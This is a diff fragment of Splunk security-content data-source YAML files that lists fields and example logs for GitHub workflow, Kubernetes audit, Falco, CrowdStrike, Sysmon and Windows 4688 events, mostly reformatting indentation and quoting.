/security_content/actions/runs/2088708615/artifacts","cancel_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/cancel","rerun_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/rerun","previous_attempt_url":null,"workflow_url":"https://api.github.com/repos/splunk/security_content/actions/workflows/4692335","head_commit":{"id":"4049334910ea3d52a917ca35aed66d11c80ed966","tree_id":"df4ddc1359be3b19f093b7a27dbf5708187743a0","message":"small
- _time
- action
- host
- index
- linecount
- meta
- punct
- source
- sourcetype
- splunk_server
- timestamp
- workflow_run.actor.avatar_url
- workflow_run.actor.events_url
- workflow_run.actor.followers_url
- workflow_run.actor.following_url
- workflow_run.actor.gists_url
- workflow_run.actor.gravatar_id
- workflow_run.actor.html_url
- workflow_run.actor.id
- workflow_run.actor.login
- workflow_run.actor.node_id
- workflow_run.actor.organizations_url
- workflow_run.actor.received_events_url
- workflow_run.actor.repos_url
- workflow_run.actor.site_admin
- workflow_run.actor.starred_url
- workflow_run.actor.subscriptions_url
- workflow_run.actor.type
- workflow_run.actor.url
- workflow_run.artifacts_url
- workflow_run.cancel_url
- workflow_run.check_suite_id
- workflow_run.check_suite_node_id
- workflow_run.check_suite_url
- workflow_run.conclusion
- workflow_run.created_at
- workflow_run.event
- workflow_run.head_branch
- workflow_run.head_commit.author.email
- workflow_run.head_commit.author.name
- workflow_run.head_commit.committer.email
- workflow_run.head_commit.committer.name
- workflow_run.head_commit.id
- workflow_run.head_commit.message
- workflow_run.head_commit.timestamp
- workflow_run.head_commit.tree_id
- workflow_run.head_repository.collaborators_url
- workflow_run.head_repository.description
- workflow_run.head_repository.fork
- workflow_run.head_repository.forks_url
- workflow_run.head_repository.full_name
- workflow_run.head_repository.hooks_url
- workflow_run.head_repository.html_url
- workflow_run.head_repository.id
- workflow_run.head_repository.keys_url
- workflow_run.head_repository.name
- workflow_run.head_repository.node_id
- workflow_run.head_repository.owner.avatar_url
- workflow_run.head_repository.owner.events_url
- workflow_run.head_repository.owner.followers_url
- workflow_run.head_repository.owner.following_url
- workflow_run.head_repository.owner.gists_url
- workflow_run.head_repository.owner.gravatar_id
- workflow_run.head_repository.owner.html_url
- workflow_run.head_repository.owner.id
- workflow_run.head_repository.owner.login
- workflow_run.head_repository.owner.node_id
- workflow_run.head_repository.owner.organizations_url
- workflow_run.head_repository.owner.received_events_url
- workflow_run.head_repository.owner.repos_url
- workflow_run.head_repository.owner.site_admin
- workflow_run.head_repository.owner.starred_url
- workflow_run.head_repository.owner.subscriptions_url
- workflow_run.head_repository.owner.type
- workflow_run.head_repository.owner.url
- workflow_run.head_repository.private
- workflow_run.head_repository.teams_url
- workflow_run.head_repository.url
- workflow_run.head_sha
- workflow_run.html_url
- workflow_run.id
- workflow_run.jobs_url
- workflow_run.logs_url
- workflow_run.name
- workflow_run.node_id
- workflow_run.previous_attempt_url
- workflow_run.pull_requests{}.base.ref
- workflow_run.pull_requests{}.base.repo.id
- workflow_run.pull_requests{}.base.repo.name
- workflow_run.pull_requests{}.base.repo.url
- workflow_run.pull_requests{}.base.sha
- workflow_run.pull_requests{}.head.ref
- workflow_run.pull_requests{}.head.repo.id
- workflow_run.pull_requests{}.head.repo.name
- workflow_run.pull_requests{}.head.repo.url
- workflow_run.pull_requests{}.head.sha
- workflow_run.pull_requests{}.id
- workflow_run.pull_requests{}.number
- workflow_run.pull_requests{}.url
- workflow_run.repository.archive_url
- workflow_run.repository.assignees_url
- workflow_run.repository.blobs_url
- workflow_run.repository.branches_url
- workflow_run.repository.collaborators_url
- workflow_run.repository.comments_url
- workflow_run.repository.commits_url
- workflow_run.repository.compare_url
- workflow_run.repository.contents_url
- workflow_run.repository.contributors_url
- workflow_run.repository.deployments_url
- workflow_run.repository.description
- workflow_run.repository.downloads_url
- workflow_run.repository.events_url
- workflow_run.repository.fork
- workflow_run.repository.forks_url
- workflow_run.repository.full_name
- workflow_run.repository.git_commits_url
- workflow_run.repository.git_refs_url
- workflow_run.repository.git_tags_url
- workflow_run.repository.hooks_url
- workflow_run.repository.html_url
- workflow_run.repository.id
- workflow_run.repository.issue_comment_url
- workflow_run.repository.issue_events_url
- workflow_run.repository.issues_url
- workflow_run.repository.keys_url
- workflow_run.repository.labels_url
- workflow_run.repository.languages_url
- workflow_run.repository.merges_url
- workflow_run.repository.milestones_url
- workflow_run.repository.name
- workflow_run.repository.node_id
- workflow_run.repository.notifications_url
- workflow_run.repository.owner.avatar_url
- workflow_run.repository.owner.events_url
- workflow_run.repository.owner.followers_url
- workflow_run.repository.owner.following_url
- workflow_run.repository.owner.gists_url
- workflow_run.repository.owner.gravatar_id
- workflow_run.repository.owner.html_url
- workflow_run.repository.owner.id
- workflow_run.repository.owner.login
- workflow_run.repository.owner.node_id
- workflow_run.repository.owner.organizations_url
- workflow_run.repository.owner.received_events_url
- workflow_run.repository.owner.repos_url
- workflow_run.repository.owner.site_admin
- workflow_run.repository.owner.starred_url
- workflow_run.repository.owner.subscriptions_url
- workflow_run.repository.owner.type
- workflow_run.repository.owner.url
- workflow_run.repository.private
- workflow_run.repository.pulls_url
- workflow_run.repository.releases_url
- workflow_run.repository.stargazers_url
- workflow_run.repository.statuses_url
- workflow_run.repository.subscribers_url
- workflow_run.repository.subscription_url
- workflow_run.repository.tags_url
- workflow_run.repository.teams_url
- workflow_run.repository.trees_url
- workflow_run.repository.url
- workflow_run.rerun_url
- workflow_run.run_attempt
- workflow_run.run_number
- workflow_run.run_started_at
- workflow_run.status
- workflow_run.triggering_actor.avatar_url
- workflow_run.triggering_actor.events_url
- workflow_run.triggering_actor.followers_url
- workflow_run.triggering_actor.following_url
- workflow_run.triggering_actor.gists_url
- workflow_run.triggering_actor.gravatar_id
- workflow_run.triggering_actor.html_url
- workflow_run.triggering_actor.id
- workflow_run.triggering_actor.login
- workflow_run.triggering_actor.node_id
- workflow_run.triggering_actor.organizations_url
- workflow_run.triggering_actor.received_events_url
- workflow_run.triggering_actor.repos_url
- workflow_run.triggering_actor.site_admin
- workflow_run.triggering_actor.starred_url
- workflow_run.triggering_actor.subscriptions_url
- workflow_run.triggering_actor.type
- workflow_run.triggering_actor.url
- workflow_run.updated_at
- workflow_run.url
- workflow_run.workflow_id
- workflow_run.workflow_url
example_log:
'{"action":"requested","workflow_run":{"id":2088708615,"name":"auto-update","node_id":"WFR_kwLOCa00Ec58fyoH","head_branch":"mac_os_detections","head_sha":"4049334910ea3d52a917ca35aed66d11c80ed966","run_number":9504,"event":"push","status":"queued","conclusion":null,"workflow_id":4692335,"check_suite_id":5918781611,"check_suite_node_id":"CS_kwDOCa00Ec8AAAABYMlwqw","url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615","html_url":"https://github.com/splunk/security_content/actions/runs/2088708615","pull_requests":[{"url":"https://api.github.com/repos/splunk/security_content/pulls/2131","id":893091277,"number":2131,"head":{"ref":"mac_os_detections","sha":"4049334910ea3d52a917ca35aed66d11c80ed966","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}},"base":{"ref":"develop","sha":"a7d3d1dc57f9bf36fe22e470bcf518fcc2c89283","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}}}],"created_at":"2022-04-04T08:43:15Z","updated_at":"2022-04-04T08:43:15Z","actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"run_attempt":1,"run_started_at":"2022-04-04T08:43:15Z","triggering_actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"jobs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/jobs","logs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/logs","check_suite_url":"https://api.github.com/repos/splunk/security_content/check-suites/5918781611","artifacts_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/artifacts","cancel_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/cancel","rerun_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/rerun","previous_attempt_url":null,"workflow_url":"https://api.github.com/repos/splunk/security_content/actions/workflows/4692335","head_commit":{"id":"4049334910ea3d52a917ca35aed66d11c80ed966","tree_id":"df4ddc1359be3b19f093b7a27dbf5708187743a0","message":"small
change","timestamp":"2022-04-04T08:43:01Z","author":{"name":"jsmith","email":"jsmith@evilcorp.com"},"committer":{"name":"jsmith","email":"jsmith@evilcorp.com"}},"repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs","repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/number}","events_url":"https://api.github.com/repos/splunk/security_content/events","assignees_url":"https://api.github.com/repos/splunk/security_content/assignees{/user}","branches_url":"https://api.github.com/repos/splunk/security_content/branches{/branch}","tags_url":"https://api.github.com/repos/splunk/security_content/tags","blobs_url":"https://api.github.com/repos/splunk/security_content/git/blobs{/sha}","git_tags_url":"https://api.github.com/repos/splunk/security_content/git/tags{/sha}","git_refs_url":"https://api.github.com/repos/splunk/security_content/git/refs{/sha}","trees_url":"https://api.github.com/repos/splunk/security_content/git/trees{/sha}","statuses_url":"https://api.github.com/repos/splunk/security_content/statuses/{sha}","languages_url":"https://api.github.com/repos/splunk/security_content/languages","stargazers_url":"https://api.github.com/repos/splunk/security_content/stargazers","contributors_url":"https://api.github.com/repos/splunk/security_content/contributors","subscribers_url":"https://api.github.com/repos/splunk/security_content/subscribers","subscription_url":"https://api.github.com/repos/splunk/security_content/subscription","commits_url":"https://api.github.com/repos/splunk/security_content/commits{/sha}","git_commits_url":"https://api.github.com/repos/splunk/security_content/git/commits{/sha}","comments_url":"https://api.github.com/repos/splunk/security_content/comments{/number}","issue_comment_url":"https://api.github.com/repos/splunk/security_content/issues/comments{/number}","contents_url":"https://api.github.com/repos/splunk/security_content/contents/{+path}","compare_url":"https://api.github.com/repos/splunk/security_content/compare/{base}...{head}","merges_url":"https://api.github.com/repos/splunk/security_content/merges","archive_url":"https://api.github.com/repos/splunk/security_content/{archive_format}{/ref}","downloads_url":"https://api.github.com/repos/splunk/security_content/downloads","issues_url":"https://api.github.com/repos/splunk/security_content/issues{/number}","pulls_url":"https://api.github.com/repos/splunk/security_content/pulls{/number}","milestones_url":"https://api.github.com/repos/splunk/security_content/milestones{/number}","notifications_url":"https://api.github.com/repos/splunk/security_content/notifications{?since,all,participating}","labels_url":"https://api.github.com/repos/splunk/security_content/labels{/name}","releases_url":"https://api.github.com/repos/splunk/security_content/releases{/id}","deployments_url":"https://api.github.com/repos/splunk/security_content/deployments"},"head_repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs","repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/num'
+48 -48
View File
@@ -3,57 +3,57 @@ id: 6c25181a-0c07-4aaf-90e6-77ab1f0e6699
author: Patrick Bareiss, Splunk
source: kubernetes
sourcetype: _json
separator: null
supported_TA: {}
event_names: []
fields:
- _time
- annotations.authorization.k8s.io/decision
- annotations.authorization.k8s.io/reason
- apiVersion
- auditID
- eventtype
- host
- index
- kind
- level
- linecount
- objectRef.apiGroup
- objectRef.apiVersion
- objectRef.namespace
- objectRef.resource
- punct
- requestReceivedTimestamp
- requestURI
- responseObject.apiVersion
- responseObject.code
- responseObject.details.group
- responseObject.details.kind
- responseObject.kind
- responseObject.message
- responseObject.reason
- responseObject.status
- responseStatus.code
- responseStatus.details.group
- responseStatus.details.kind
- responseStatus.message
- responseStatus.reason
- responseStatus.status
- source
- sourceIPs{}
- sourcetype
- splunk_server
- stage
- stageTimestamp
- tag
- tag::eventtype
- timestamp
- user.groups{}
- user.uid
- user.username
- userAgent
- verb
example_log: '{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","auditID":"582c31ab-4906-49bb-9ff9-872f980ccb84","stage":"ResponseComplete","requestURI":"/apis/batch/v1/namespaces/test2/jobs?fieldManager=kubectl-create\u0026fieldValidation=Strict","verb":"create","user":{"username":"k8s-test-user","uid":"aws-iam-authenticator:591511147606:AROAYTOGP2RLFHNBOTP5J","groups":["system:authenticated"]},"sourceIPs":["176.95.188.101"],"userAgent":"kubectl/v1.27.2
- _time
- annotations.authorization.k8s.io/decision
- annotations.authorization.k8s.io/reason
- apiVersion
- auditID
- eventtype
- host
- index
- kind
- level
- linecount
- objectRef.apiGroup
- objectRef.apiVersion
- objectRef.namespace
- objectRef.resource
- punct
- requestReceivedTimestamp
- requestURI
- responseObject.apiVersion
- responseObject.code
- responseObject.details.group
- responseObject.details.kind
- responseObject.kind
- responseObject.message
- responseObject.reason
- responseObject.status
- responseStatus.code
- responseStatus.details.group
- responseStatus.details.kind
- responseStatus.message
- responseStatus.reason
- responseStatus.status
- source
- sourceIPs{}
- sourcetype
- splunk_server
- stage
- stageTimestamp
- tag
- tag::eventtype
- timestamp
- user.groups{}
- user.uid
- user.username
- userAgent
- verb
example_log:
'{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","auditID":"582c31ab-4906-49bb-9ff9-872f980ccb84","stage":"ResponseComplete","requestURI":"/apis/batch/v1/namespaces/test2/jobs?fieldManager=kubectl-create\u0026fieldValidation=Strict","verb":"create","user":{"username":"k8s-test-user","uid":"aws-iam-authenticator:591511147606:AROAYTOGP2RLFHNBOTP5J","groups":["system:authenticated"]},"sourceIPs":["176.95.188.101"],"userAgent":"kubectl/v1.27.2
(darwin/arm64) kubernetes/7f6f68f","objectRef":{"resource":"jobs","namespace":"test2","apiGroup":"batch","apiVersion":"v1"},"responseStatus":{"metadata":{},"status":"Failure","message":"jobs.batch
is forbidden: User \"k8s-test-user\" cannot create resource \"jobs\" in API group
\"batch\" in the namespace \"test2\"","reason":"Forbidden","details":{"group":"batch","kind":"jobs"},"code":403},"responseObject":{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"jobs.batch
+37 -37
View File
@@ -3,46 +3,46 @@ id: 23c0eeed-840a-4711-a41b-6819c1ffbba5
author: Patrick Bareiss, Splunk
source: kubernetes
sourcetype: kube:container:falco
separator: null
supported_TA: {}
event_names: []
fields:
- _time
- command
- container_id
- container_image
- container_image_tag
- container_name
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- evt_type
- exe_flags
- host
- index
- k8s_ns
- k8s_pod_name
- linecount
- parent
- proc_exepath
- process
- punct
- source
- sourcetype
- splunk_server
- terminal
- timeendpos
- timestartpos
- user
- user_loginuid
- user_uid
example_log: '12:18:18.691725165: Notice A shell was spawned in a container with an
- _time
- command
- container_id
- container_image
- container_image_tag
- container_name
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- evt_type
- exe_flags
- host
- index
- k8s_ns
- k8s_pod_name
- linecount
- parent
- proc_exepath
- process
- punct
- source
- sourcetype
- splunk_server
- terminal
- timeendpos
- timestartpos
- user
- user_loginuid
- user_uid
example_log:
"12:18:18.691725165: Notice A shell was spawned in a container with an
attached terminal (evt_type=execve user=root user_uid=0 user_loginuid=-1 process=bash
proc_exepath=/usr/lib/splunk-otel-collector/agent-bundle/bin/bash parent=runc command=bash
-il terminal=34816 exe_flags=EXE_WRITABLE container_id=7a2566e8e462 container_image=quay.io/signalfx/splunk-otel-collector
container_image_tag=0.88.0 container_name=otel-collector k8s_ns=default k8s_pod_name=my-splunk-otel-collector-agent-9sdhr)'
container_image_tag=0.88.0 container_name=otel-collector k8s_ns=default k8s_pod_name=my-splunk-otel-collector-agent-9sdhr)"
@@ -1,92 +1,92 @@
event_name: Crowdstrike ProcessRollup2
fields:
- AuthenticationId
- AuthenticationId_meaning
- AuthenticodeHashData
- CommandLine
- ConfigBuild
- ConfigStateHash
- EffectiveTransmissionClass
- Entitlements
- EventOrigin
- ImageFileName
- ImageSubsystem
- ImageSubsystem_meaning
- IntegrityLevel
- IntegrityLevel_meaning
- MD5HashData
- ParentAuthenticationId
- ParentBaseFileName
- ParentProcessId
- ProcessCreateFlags
- ProcessEndTime
- ProcessParameterFlags
- ProcessParameterFlags_meaning
- ProcessStartTime
- ProcessSxsFlags
- ProcessSxsFlags_meaning
- RawProcessId
- SHA1HashData
- SHA256HashData
- SessionId
- SignInfoFlags
- SignInfoFlags_meaning
- SourceProcessId
- SourceThreadId
- Tags
- TargetProcessId
- TokenType
- TokenType_meaning
- UserSid
- WindowFlags
- WindowFlags_meaning
- action
- aid
- aid_city
- aid_computer_name
- aid_continent
- aid_country
- aid_machine_domain
- aid_os_version
- aid_ou
- aid_site_name
- aid_system_product_name
- aip
- cid
- dest
- event_ingest_time
- event_platform
- event_simpleName
- eventtype
- host_res_aid
- id
- os
- parent_process_exec
- parent_process_id
- parent_process_name
- process
- process_exec
- process_hash
- process_id
- process_integrity_level
- process_name
- process_path
- resolve_dest
- resolve_process_integrity_level
- tag
- timestamp
- user
- user_id
- vendor_product
- AuthenticationId
- AuthenticationId_meaning
- AuthenticodeHashData
- CommandLine
- ConfigBuild
- ConfigStateHash
- EffectiveTransmissionClass
- Entitlements
- EventOrigin
- ImageFileName
- ImageSubsystem
- ImageSubsystem_meaning
- IntegrityLevel
- IntegrityLevel_meaning
- MD5HashData
- ParentAuthenticationId
- ParentBaseFileName
- ParentProcessId
- ProcessCreateFlags
- ProcessEndTime
- ProcessParameterFlags
- ProcessParameterFlags_meaning
- ProcessStartTime
- ProcessSxsFlags
- ProcessSxsFlags_meaning
- RawProcessId
- SHA1HashData
- SHA256HashData
- SessionId
- SignInfoFlags
- SignInfoFlags_meaning
- SourceProcessId
- SourceThreadId
- Tags
- TargetProcessId
- TokenType
- TokenType_meaning
- UserSid
- WindowFlags
- WindowFlags_meaning
- action
- aid
- aid_city
- aid_computer_name
- aid_continent
- aid_country
- aid_machine_domain
- aid_os_version
- aid_ou
- aid_site_name
- aid_system_product_name
- aip
- cid
- dest
- event_ingest_time
- event_platform
- event_simpleName
- eventtype
- host_res_aid
- id
- os
- parent_process_exec
- parent_process_id
- parent_process_name
- process
- process_exec
- process_hash
- process_id
- process_integrity_level
- process_name
- process_path
- resolve_dest
- resolve_process_integrity_level
- tag
- timestamp
- user
- user_id
- vendor_product
field_mappings:
- data_model: cim
data_set: Endpoint.Processes
mapping:
CommandLine: Processes.process
ImageFileName: Processes.process_path
ImageFileName: Processes.process_path
ParentBaseFileName: Processes.parent_process_name
ParentProcessId: Processes.parent_process_id
RawProcessId: Processes.process_id
SHA256HashData: Processes.process_hash
UserSid: Processes.user
example_log: {"LinkName":"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk","ProcessCreateFlags":"67634196","IntegrityLevel":"12288","ParentProcessId":"5459598860","SourceProcessId":"5459598860","aip":"3.126.231.40","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-586445407-708991241-1829972403-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"explorer.exe","EventOrigin":"1","ImageSubsystem":"3","id":"e2210781-0e8f-47d2-bf6a-56d2c59f38ee","EffectiveTransmissionClass":"3","SessionId":"2","ShowWindowFlags":"1","Tags":"27, 40, 151, 874, 924, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1713805173418","event_simpleName":"ProcessRollup2","RawProcessId":"5012","ConfigStateHash":"840884426","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"2669499","ConfigBuild":"1007.3.0018207.1","WindowFlags":"3073","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentAuthenticationId":"2669499","TargetProcessId":"5642133882","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"30426051160","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1713805173.321","ProcessParameterFlags":"24577","aid":"168a90e125d443beb2a4e2914985084d","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
example_log: '{"LinkName":"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk","ProcessCreateFlags":"67634196","IntegrityLevel":"12288","ParentProcessId":"5459598860","SourceProcessId":"5459598860","aip":"3.126.231.40","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-586445407-708991241-1829972403-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"explorer.exe","EventOrigin":"1","ImageSubsystem":"3","id":"e2210781-0e8f-47d2-bf6a-56d2c59f38ee","EffectiveTransmissionClass":"3","SessionId":"2","ShowWindowFlags":"1","Tags":"27, 40, 151, 874, 924, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1713805173418","event_simpleName":"ProcessRollup2","RawProcessId":"5012","ConfigStateHash":"840884426","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"2669499","ConfigBuild":"1007.3.0018207.1","WindowFlags":"3073","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentAuthenticationId":"2669499","TargetProcessId":"5642133882","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"30426051160","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1713805173.321","ProcessParameterFlags":"24577","aid":"168a90e125d443beb2a4e2914985084d","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}'
@@ -1,102 +1,102 @@
event_name: Sysmon EventID 1
fields:
- _time
- Channel
- CommandLine
- Company
- Computer
- CurrentDirectory
- Description
- EventChannel
- EventCode
- EventData_Xml
- EventDescription
- EventID
- EventRecordID
- FileVersion
- Guid
- Hashes
- IMPHASH
- Image
- IntegrityLevel
- Keywords
- Level
- LogonGuid
- LogonId
- MD5
- Name
- Opcode
- OriginalFileName
- ParentCommandLine
- ParentImage
- ParentProcessGuid
- ParentProcessId
- ProcessGuid
- ProcessID
- ProcessId
- Product
- RecordID
- RecordNumber
- RuleName
- SHA256
- SecurityID
- SystemTime
- System_Props_Xml
- Task
- TerminalSessionId
- ThreadID
- TimeCreated
- User
- UserID
- UtcTime
- Version
- action
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- dvc_nt_host
- event_id
- eventtype
- host
- id
- index
- linecount
- original_file_name
- os
- parent_process
- parent_process_exec
- parent_process_guid
- parent_process_id
- parent_process_name
- parent_process_path
- process
- process_current_directory
- process_exec
- process_guid
- process_hash
- process_id
- process_integrity_level
- process_name
- process_path
- punct
- signature
- signature_id
- source
- sourcetype
- splunk_server
- tag
- tag::eventtype
- timeendpos
- timestartpos
- user
- user_id
- vendor_product
- _time
- Channel
- CommandLine
- Company
- Computer
- CurrentDirectory
- Description
- EventChannel
- EventCode
- EventData_Xml
- EventDescription
- EventID
- EventRecordID
- FileVersion
- Guid
- Hashes
- IMPHASH
- Image
- IntegrityLevel
- Keywords
- Level
- LogonGuid
- LogonId
- MD5
- Name
- Opcode
- OriginalFileName
- ParentCommandLine
- ParentImage
- ParentProcessGuid
- ParentProcessId
- ProcessGuid
- ProcessID
- ProcessId
- Product
- RecordID
- RecordNumber
- RuleName
- SHA256
- SecurityID
- SystemTime
- System_Props_Xml
- Task
- TerminalSessionId
- ThreadID
- TimeCreated
- User
- UserID
- UtcTime
- Version
- action
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- dvc_nt_host
- event_id
- eventtype
- host
- id
- index
- linecount
- original_file_name
- os
- parent_process
- parent_process_exec
- parent_process_guid
- parent_process_id
- parent_process_name
- parent_process_path
- process
- process_current_directory
- process_exec
- process_guid
- process_hash
- process_id
- process_integrity_level
- process_name
- process_path
- punct
- signature
- signature_id
- source
- sourcetype
- splunk_server
- tag
- tag::eventtype
- timeendpos
- timestartpos
- user
- user_id
- vendor_product
field_mappings:
- data_model: cim
data_set: Endpoint.Processes
@@ -117,9 +117,9 @@ field_mappings:
Computer: Processes.dest
OriginalFileName: Processes.original_file_name
convert_to_log_source:
- data_source: Windows Security 4688
- data_source: Windows Event Log Security 4688
mapping:
ProcessId: NewProcessId
ProcessId: NewProcessId
Image: NewProcessName
Image|endswith: NewProcessName|endswith
CommandLine: Process_Command_Line
@@ -1,81 +1,81 @@
event_name: Windows Event Log Security 4688
fields:
- Caller_Domain
- Caller_User_Name
- Channel
- CommandLine
- Computer
- Error_Code
- EventCode
- EventID
- EventRecordID
- Guid
- Keywords
- Level
- Logon_ID
- MandatoryLabel
- Name
- NewProcessId
- NewProcessName
- Opcode
- ParentProcessName
- ProcessID
- Process_Command_Line
- RecordNumber
- SubjectDomainName
- SubjectLogonId
- SubjectUserName
- SubjectUserSid
- SystemTime
- TargetDomainName
- TargetLogonId
- TargetUserName
- TargetUserSid
- Target_Domain
- Target_User_Name
- Task
- ThreadID
- TokenElevationType
- Token_Elevation_Type
- Token_Elevation_Type_id
- Version
- action
- app
- dest
- dvc
- dvc_nt_host
- event_id
- eventtype
- id
- name
- new_process
- new_process_id
- new_process_name
- parent_process
- parent_process_id
- parent_process_name
- parent_process_path
- process
- process_command_line_arguments
- process_command_line_process
- process_exec
- process_id
- process_name
- process_path
- product
- session_id
- signature
- signature_id
- src_nt_domain
